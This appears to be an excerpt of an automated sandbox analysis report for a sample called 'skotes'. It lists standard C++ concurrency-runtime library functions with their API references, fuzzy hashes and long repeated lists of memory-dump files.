                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2033596534-0
                                                                                                                                                                    • Opcode ID: 5725734c5351b5826609096eed807be75082f3c8bc5252c4550a01eb9b3c9c19
                                                                                                                                                                    • Instruction ID: f80244b4c36034c22176ea9f3c7e348febb1f4b6197d04c5a87abc0e0e0338a9
                                                                                                                                                                    • Opcode Fuzzy Hash: 5725734c5351b5826609096eed807be75082f3c8bc5252c4550a01eb9b3c9c19
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B2186759009149FDB45EF68D9839ADB7B6EF05310F214069F001AB252DB716D42CFA5
                                                                                                                                                                    Function 0063A026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0063A069
                                                                                                                                                                      • Part of subcall function 0063B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0063B5AF
                                                                                                                                                                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0063A07F
                                                                                                                                                                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0063A0CB
                                                                                                                                                                      • Part of subcall function 0063AB41: List.LIBCONCRT ref: 0063AB77
                                                                                                                                                                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0063A0DB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 932774601-0
                                                                                                                                                                    • Opcode ID: 9439c87c4149305800a74a94a62e19263da1499f620fb72571e1f88fb877ba31
                                                                                                                                                                    • Instruction ID: d2a51506212afb5709e94741bc1bbbec8d4a377bd66f79cadbd00ce883cdd68c
                                                                                                                                                                    • Opcode Fuzzy Hash: 9439c87c4149305800a74a94a62e19263da1499f620fb72571e1f88fb877ba31
                                                                                                                                                                    • Instruction Fuzzy Hash: 7921AE31500A149FCB28EFA5D9908AAF3F6FF48310B00555DE582A7651DB30B905DBE6
                                                                                                                                                                    Function 00634885 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 00634893
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 006348A5
                                                                                                                                                                      • Part of subcall function 00635555: _InternalDeleteHelper.LIBCONCRT ref: 00635564
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 006348AF
                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 006348C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3844194624-0
                                                                                                                                                                    • Opcode ID: 293897c63459ee9c3c039fb42dad99d0efc27a16a5e5b00feff88103d6de69a9
                                                                                                                                                                    • Instruction ID: d843f3bc8597e3ad13e3dbd22f4b1e8e55cfb966bfd71c30f9afd14c813fa179
                                                                                                                                                                    • Opcode Fuzzy Hash: 293897c63459ee9c3c039fb42dad99d0efc27a16a5e5b00feff88103d6de69a9
                                                                                                                                                                    • Instruction Fuzzy Hash: E401D171600921AFCA65BF64E8C2E6EF76BBF44720B04052DF80597612CF20FC218BE4
                                                                                                                                                                    Function 0063EE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0063EE6A
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0063EE7C
                                                                                                                                                                      • Part of subcall function 0063EF29: _InternalDeleteHelper.LIBCONCRT ref: 0063EF3B
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0063EE86
                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 0063EE9F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3844194624-0
                                                                                                                                                                    • Opcode ID: 1c15196b0d0abebe3dd36e336026f1f2378de3853c2044a4193ab14f619fb008
                                                                                                                                                                    • Instruction ID: 9d800da88a16fe41eac1290766e07903c8bb939818caf8df3ff55fe4b5a85885
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c15196b0d0abebe3dd36e336026f1f2378de3853c2044a4193ab14f619fb008
                                                                                                                                                                    • Instruction Fuzzy Hash: FD01D671600521AFCB657B60D8C2D6EBB6BBF44721F04002DF40497791CB25FC119AF4
                                                                                                                                                                    Function 0063D0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0063D0C5
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0063D0D7
                                                                                                                                                                      • Part of subcall function 0063C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0063C6C4
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0063D0E1
                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 0063D0FA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
